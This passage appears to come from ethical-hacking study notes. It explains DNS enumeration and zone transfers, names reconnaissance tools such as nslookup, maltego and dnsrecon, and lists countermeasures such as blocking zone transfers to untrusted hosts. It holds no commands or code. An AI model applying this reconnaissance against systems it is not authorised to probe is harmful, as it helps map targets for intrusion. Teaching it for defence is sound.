Disable open relay feature.
DNS Enumeration
DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems. The list of DNS record provides an overview of types of resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses.
DNS Zone Transfer used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server will perform a specific zone transfer request from a ―name server. If the name server allows zone transfers by an anonymous user to occur, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text.
Tools:
nslookup
maltego
dnenum
dnsrecon
Countermeasures:
Disable Zone transfer by untrusted hosts
Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers.
Use premium registration services.
